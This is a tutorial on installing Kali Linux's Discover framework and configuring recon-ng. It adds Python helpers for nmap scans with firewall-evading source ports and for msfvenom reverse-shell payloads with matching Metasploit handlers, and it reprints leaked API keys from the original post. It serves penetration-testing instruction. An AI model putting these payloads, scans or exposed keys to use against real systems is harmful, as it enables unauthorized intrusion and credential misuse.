Installing Discover on Kali Linux

SOURCE: http://www.thegeeky.space/2015/04/how-to-save-time-doing-passive-discovery-in-Kali-Linux-using-discover-or-backtrack-script-framework.html

Configuring recon-ng
Register for the API keys below. Keys marked * are the ones Discover needs for passive recon. The key values shown after some entries are the ones the original post published; a key pasted on a public page has to be treated as compromised, so register your own.
- register bing_api*: go to https://azure.microsoft.com/en-us/services/cognitive-services/search/ and sign in using your Hotmail or Skype account, or create a new account
- register builtwith_api*: https://api.builtwith.com
  d7cfa1da-8bc2-46df-816e-e1fbd888475c
- register facebook_api: https://developers.facebook.com
- register fullcontact_api*: https://portal.fullcontact.com/signup
  574dcf32717c83a9
- register github_api*
- google_cse (the original listed this value under github_api; the keys list below shows it is the google_cse key):
  AIzaSyBDUbBRqbI3Oq3zVY34TiYBzzLGjPFsVQ0
- hashes_api (likewise listed under github_api in the original; it is the hashes_api key in the list below):
  0CImE8MxyVI6ZAoldvGdfNcaLdsXQ8
- register ipinfodb_api: http://www.ipinfodb.com/register.php
- register linkedin_api: https://developer.linkedin.com
- register shodan_api*: https://www.shodan.io/
  7Bl9THLHdEEFFyYJy0QOc69CtIEGKGpD
- register twitter_api: https://dev.twitter.com
NOTE:
- API keys marked * are needed.

# recon-ng
  keys add bing_api <value>
  keys add builtwith_api <value>
  keys add fullcontact_api <value>
  keys add github_api <value>
  keys add google_api <value>
  keys add google_cse <value>
  keys add hashes_api <value>
  keys add shodan_api <value>

> keys list
  +------------------+----------------------------------------+
  | Name             | Value                                  |
  +------------------+----------------------------------------+
  | bing_api         |                                        |
  | builtwith_api    | d7cfa1da-8bc2-46df-816e-e1fbd8884…     |
  | censysio_id      |                                        |
  | censysio_secret  |                                        |
  | flickr_api       |                                        |
  | fullcontact_api  | 574dcf32717c8…                         |
  | github_api       |                                        |
  | google_api       |                                        |
  | google_cse       | AIzaSyBDUbBRqbI3Oq3zVY34TiYBzzLGjPFs…  |
  | hashes_api       | 0CImE8MxyVI6ZAoldvGdfNcaLds…           |
  | instagram_api    |                                        |
  | instagram_secret |                                        |
  | ipinfodb_api     |                                        |
  | jigsaw_api       |                                        |
  | jigsaw_password  |                                        |
  | jigsaw_username  |                                        |
  | linkedin_api     |                                        |
  | linkedin_secret  |                                        |
  | pwnedlist_api    |                                        |
  | pwnedlist_iv     |                                        |
  | pwnedlist_secret |                                        |
  | shodan_api       | 7Bl9THLHdEEFFyYJy0QOc69CtIEGK…         |
  | twitter_api      |                                        |
  | twitter_secret   |                                        |
  +------------------+----------------------------------------+
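Typing `keys add` for each key every time recon-ng is reinstalled is error-prone, and the keys end up in shell history. The following is an added example (my code, not recon-ng's or Discover's): it reads the keys from environment variables named RECON_<KEY> (a convention I am assuming, e.g. RECON_SHODAN_API), refuses to proceed unless every required key is set, and writes a resource file that recon-ng loads with its documented `-r` flag. The REQUIRED set is the starred keys above plus google_api, google_cse and hashes_api, which Discover's Domain menu also asks for.

```python
"""Write a recon-ng resource file from API keys kept in environment variables.

Added example (not recon-ng's or Discover's code).  Export the keys as
RECON_<NAME> (assumed convention), run this, then `recon-ng -r keys.rc`.
"""
import os
import re
from typing import Iterable, Mapping

# starred keys on this page plus the three Discover's Domain menu also asks for
REQUIRED = ("bing_api", "builtwith_api", "fullcontact_api", "github_api",
            "google_api", "google_cse", "hashes_api", "shodan_api")
OPTIONAL = ("censysio_id", "censysio_secret", "ipinfodb_api", "linkedin_api",
            "linkedin_secret", "twitter_api", "twitter_secret")

# resource lines are fed to recon-ng verbatim, so a value containing whitespace
# or a control character would be split into a different command: accept
# printable non-space ASCII only
KEY_RE = re.compile(r"^[!-~]{8,}$")


def env_name(key: str) -> str:
    """recon-ng key name -> environment variable (my convention): shodan_api -> RECON_SHODAN_API."""
    return "RECON_" + key.upper()


def collect_keys(env: Mapping[str, str], names: Iterable[str]) -> dict:
    """{key_name: value} for every name whose variable is set and non-empty."""
    found = {}
    for name in names:
        value = env.get(env_name(name), "").strip()
        if value:
            found[name] = value
    return found


def missing_required(env: Mapping[str, str]) -> list:
    have = collect_keys(env, REQUIRED)
    return [k for k in REQUIRED if k not in have]


def mask(value: str) -> str:
    """Prefix only, for console output and logs; never echo a full key."""
    return value[:4] + "..." if len(value) > 4 else "..."


def build_resource(env: Mapping[str, str]) -> str:
    """Render `keys add` lines for recon-ng -r; ValueError if a required key is absent or malformed."""
    missing = missing_required(env)
    if missing:
        raise ValueError("missing required keys: " + ", ".join(missing))
    lines = []
    for name, value in collect_keys(env, REQUIRED + OPTIONAL).items():
        if not KEY_RE.match(value):
            raise ValueError(f"{name}: key contains whitespace or control characters")
        lines.append(f"keys add {name} {value}")
    lines.append("keys list")   # recon-ng echoes its table so you can confirm what loaded
    lines.append("exit")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    rc = build_resource(os.environ)
    with open("keys.rc", "w") as fh:
        fh.write(rc)
    for line in rc.splitlines():
        if line.startswith("keys add "):
            _, _, name, value = line.split(" ", 3)
            print(f"{name:<16} {mask(value)}")
    print("wrote keys.rc; load it with: recon-ng -r keys.rc   (then delete keys.rc)")
```

keys.rc holds the secrets in clear text, so create it with a restrictive umask and delete it once `recon-ng -r keys.rc` has run; recon-ng keeps the keys in its own keys database after that, which is what `keys list` reads.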

Installing Discover
# cd /root
# git clone https://github.com/leebaird/discover
# cd discover
# ./update.sh
# chmod +x /usr/share/theharvester/theHarvester.py
update.sh pulls the latest version of the framework; the chmod makes Kali's copy of theHarvester executable so Discover can call it directly.

# ./discover.sh
______  ___ ______ ______  _____  _    _ ______  _____
|     \  |  |____  |      |     |  \  /  |_____ |____/
|_____/ _|_ _____| |_____ |_____|   \/   |_____ |    \_
By Lee Baird
RECON
1.  Domain
2.  Person
3.  Parse salesforce

SCANNING
4.  Generate target list
5.  CIDR
6.  List
7.  IP, range, or URL
8.  Rerun Nmap scripts and MSF aux.

WEB
9.  Insecure direct object reference
10. Open multiple tabs in Firefox
11. Nikto
12. SSL

MISC
13. Crack WiFi
14. Parse XML
15. Generate a malicious payload
16. Start a Metasploit listener
17. Update
18. Exit
Choice:

Domain
RECON
1. Passive
2. Active
3. Previous menu
– Passive uses ARIN, dnsrecon, goofile, goog-mail, goohost, theHarvester, Metasploit, URLCrazy, Whois, multiple websites, and recon-ng.
– Active uses Nmap, dnsrecon, Fierce, lbd, wafw00f, traceroute, and Whatweb.
– Acquire API keys for Bing, Builtwith, Fullcontact, GitHub, Google, Hashes, and Shodan for maximum results with recon-ng.

Person
RECON
First name:
Last name:
– Combines info from multiple websites.

Parse salesforce
Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.
Enter the location of your list:
– Gather names and positions into a clean list.

SCANNING
Generate target list
SCANNING
1. Local area network
2. NetBIOS
3. netdiscover
4. Ping sweep
5. Previous menu
– Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.

CIDR, List, IP, Range, or URL
Type of scan:
1. External
2. Internal
3. Previous menu
– External scan will set the nmap source port to 53 and the max-rtt-timeout to 1500ms.
– Internal scan will set the nmap source port to 88 and the max-rtt-timeout to 500ms.
– Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.
– Matching nmap scripts are used for additional enumeration.
– Additional tools: enum4linux, smbclient, and ike-scan.
– Matching Metasploit auxiliary modules are also leveraged.
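The menu text gives the source port and RTT values but not the nmap syntax behind them. The following added example (my code, not discover.sh) composes the command line for the four target types the menu accepts. Only the source port (53 / 88) and `--max-rtt-timeout` (1500ms / 500ms) come from this page; the scan flags `-sS -sV -O --open` and the `-oA` output are my choice to match "host discovery, port scanning, service enumeration and OS identification", and whatever else discover.sh passes is not shown here.

```python
"""Compose the nmap command behind Discover's CIDR / List / IP, range or URL menu.

Added example, not discover.sh itself; see the lead-in for which values are
taken from the page and which are assumptions.
"""
import ipaddress
import os
import re
import shlex
from urllib.parse import urlsplit

PROFILES = {
    # -g (= --source-port) 53 or 88: stateless ACLs that let DNS or Kerberos
    # replies back in often let probes from those ports through as well.  The
    # RTT cap bounds how long nmap waits per probe; a LAN answers fast, so the
    # internal profile gets the tighter value.
    "external": {"source_port": 53, "max_rtt": "1500ms"},
    "internal": {"source_port": 88, "max_rtt": "500ms"},
}
RANGE_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}-\d{1,3}$")  # e.g. 10.0.0.1-254


def classify_target(target: str) -> str:
    """'list' for a file of targets, else 'cidr', 'range', 'ip' or 'url'."""
    if os.path.isfile(target):
        return "list"
    try:
        ipaddress.ip_network(target, strict=False)
        return "cidr" if "/" in target else "ip"
    except ValueError:
        pass
    return "range" if RANGE_RE.match(target) else "url"


def target_args(target: str) -> list:
    kind = classify_target(target)
    if kind == "list":
        return ["-iL", target]
    if kind == "url":
        # nmap wants a host, not a URL: drop scheme, port and path
        host = urlsplit(target if "://" in target else "//" + target).hostname
        if not host:
            raise ValueError(f"no host in {target!r}")
        return [host]
    return [target]  # CIDR, dashed range and single IP are nmap-native syntax


def build_nmap_args(scan_type: str, target: str, out_prefix: str = "nmap") -> list:
    """argv for subprocess.run(); -sS and -O need root, so run it as root on Kali."""
    p = PROFILES[scan_type]  # KeyError on anything other than external/internal
    return (["nmap", "-g", str(p["source_port"]), "--max-rtt-timeout", p["max_rtt"],
             "-sS", "-sV", "-O", "--open", "-oA", out_prefix]
            + target_args(target))


def render(args: list) -> str:
    """Shell-quoted one-liner, safe to paste into notes or a script."""
    return shlex.join(args)


if __name__ == "__main__":
    import sys
    print(render(build_nmap_args(sys.argv[1], sys.argv[2])))
```

`-oA` writes the .nmap, .gnmap and .xml files together; the .xml is what the Parse XML menu later turns into CSV.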

WEB
Insecure direct object reference
Using Burp, authenticate to a site, map & Spider, then log out.
Target > Site map > select the URL > right click > Copy URLs in this host.
Paste the results into a new file.
Enter the location of your file:

Open multiple tabs in Firefox
Open multiple tabs in Firefox with:
1. List
2. Directories from a domain's robots.txt.
3. Previous menu
– Use a list containing IPs and/or URLs.
– Use wget to pull a domain's robots.txt file, then open all of the directories it lists.
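Turning robots.txt into a list of tabs needs a small parser: Disallow and Allow entries can be files rather than directories, can repeat, and can be wildcard patterns that are not real paths. The following is an added example (mine, not discover.sh's implementation) that extracts the unique directory URLs; ROBOTS is a constructed sample, not fetched from any real site.

```python
"""Turn a domain's robots.txt into the directory URLs to open in Firefox.

Added example, not Discover's code.  ROBOTS is a constructed sample.
"""
from urllib.parse import urljoin

ROBOTS = """\
# constructed sample robots.txt
User-agent: *
Disallow: /admin/
Disallow: /backup/db.sql
Disallow: /cgi-bin/
Disallow: /*.php$
Allow: /public/
Sitemap: https://www.example.com/sitemap.xml
Disallow: /admin/
"""


def robots_paths(text: str) -> list:
    """Unique, ordered directory paths named by Disallow/Allow directives."""
    seen, out = set(), []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        field, _, value = line.partition(":")
        if field.strip().lower() not in ("disallow", "allow"):
            continue
        path = value.strip()
        if not path.startswith("/") or any(c in path for c in "*$"):
            continue                                   # empty rule or wildcard pattern
        if not path.endswith("/"):                     # /backup/db.sql -> /backup/
            path = path.rsplit("/", 1)[0] + "/"
        if path == "/":                                # "Disallow: /" is the whole site
            continue
        if path not in seen:
            seen.add(path)
            out.append(path)
    return out


def directory_urls(base: str, text: str) -> list:
    return [urljoin(base, p) for p in robots_paths(text)]


if __name__ == "__main__":
    import subprocess
    import sys
    import urllib.request
    base = f"https://{sys.argv[1]}"                    # e.g. www.example.com
    with urllib.request.urlopen(f"{base}/robots.txt", timeout=10) as resp:
        body = resp.read().decode("utf-8", "replace")
    urls = directory_urls(base, body)
    print("\n".join(urls))
    subprocess.run(["firefox"] + urls)                 # one tab per directory
```

Passing several URLs to one `firefox` invocation opens them as tabs in the running profile, which is what the menu item does with the list.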

Nikto
Run multiple instances of Nikto in parallel.
1. List of IPs.
2. List of IP:port.
3. Previous menu

SSL
Check for SSL certificate issues.
Enter the location of your list:
– Use sslscan and sslyze to check for SSL/TLS certificate issues.

MISC
Crack WiFi
– Crack wireless networks.

Parse XML
Parse XML to CSV.
1. Burp (Base64)
2. Nessus
3. Nexpose
4. Nmap
5. Qualys
6. Previous menu

Generate a malicious payload
MALICIOUS PAYLOADS
1. android/meterpreter/reverse_tcp
2. cmd/windows/reverse_powershell
3. linux/x64/shell_reverse_tcp
4. linux/x86/meterpreter/reverse_tcp
5. osx/x64/shell_reverse_tcp
6. php/meterpreter/reverse_tcp
7. windows/meterpreter/reverse_tcp
8. windows/x64/meterpreter/reverse_tcp
9. Previous menu

Start a Metasploit listener
Metasploit LISTENERS
1. android/meterpreter/reverse_tcp
2. cmd/windows/reverse_powershell
3. linux/x64/shell_reverse_tcp
4. linux/x86/meterpreter/reverse_tcp
5. osx/x64/shell_reverse_tcp
6. php/meterpreter/reverse_tcp
7. windows/meterpreter/reverse_tcp
8. windows/x64/meterpreter/reverse_tcp
9. Previous menu
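The two menus are mirror images: each payload needs an msfvenom command to build it and a multi/handler configured with the same payload, host and port to catch it. The following added example (my code; how discover.sh implements these menus is not shown on this page) generates both from one set of inputs and rejects a bad port or host before anything is built. The msfvenom flags (`-p`, `LHOST=`, `LPORT=`, `-f`, `-o`) and the handler options are standard Metasploit usage; the output format picked per payload family (exe, elf, macho, raw) is my assumption.

```python
"""msfvenom command plus matching multi/handler resource script for the menu payloads.

Added example, not Discover's implementation.  FORMATS is my assumption.
"""
import ipaddress
import shlex

PAYLOADS = [
    "android/meterpreter/reverse_tcp",
    "cmd/windows/reverse_powershell",
    "linux/x64/shell_reverse_tcp",
    "linux/x86/meterpreter/reverse_tcp",
    "osx/x64/shell_reverse_tcp",
    "php/meterpreter/reverse_tcp",
    "windows/meterpreter/reverse_tcp",
    "windows/x64/meterpreter/reverse_tcp",
]

# (msfvenom -f format, output file) per payload family; assumption on my part
FORMATS = {
    "android/": ("raw", "payload.apk"),
    "cmd/":     ("raw", "payload.txt"),
    "linux/":   ("elf", "payload.elf"),
    "osx/":     ("macho", "payload.macho"),
    "php/":     ("raw", "payload.php"),
    "windows/": ("exe", "payload.exe"),
}


def check_listener(lhost: str, lport: int) -> None:
    """Reject obviously wrong listener settings before generating anything."""
    if not 1 <= int(lport) <= 65535:
        raise ValueError(f"LPORT out of range: {lport}")
    try:
        ipaddress.ip_address(lhost)
        return
    except ValueError:
        pass
    # a DNS name is fine, but it must not carry shell or msfconsole separators
    if not lhost or any(c in lhost for c in " ;\n'\""):
        raise ValueError(f"bad LHOST: {lhost!r}")


def output_format(payload: str) -> tuple:
    if payload not in PAYLOADS:
        raise ValueError(f"payload not on Discover's menu: {payload}")
    for prefix, fmt in FORMATS.items():
        if payload.startswith(prefix):
            return fmt
    raise ValueError(payload)  # unreachable for the menu above


def msfvenom_cmd(payload: str, lhost: str, lport: int) -> str:
    check_listener(lhost, lport)
    fmt, out = output_format(payload)
    return shlex.join(["msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}",
                       "-f", fmt, "-o", out])


def handler_rc(payload: str, lhost: str, lport: int) -> str:
    """Contents for `msfconsole -r handler.rc`: a backgrounded handler that survives the first session."""
    check_listener(lhost, lport)
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",  # keep listening after the first callback
        "exploit -j -z",            # run as a job, do not auto-interact
    ]) + "\n"


if __name__ == "__main__":
    import sys
    payload, lhost, lport = sys.argv[1], sys.argv[2], int(sys.argv[3])
    print(msfvenom_cmd(payload, lhost, lport))
    with open("handler.rc", "w") as fh:
        fh.write(handler_rc(payload, lhost, lport))
    print("wrote handler.rc; start it with: msfconsole -r handler.rc")
```

Keeping payload generation and handler creation in one function pair is the point: a handler set to the 32-bit meterpreter will not catch the x64 build, and the mismatch is easy to make when the two menus are driven separately.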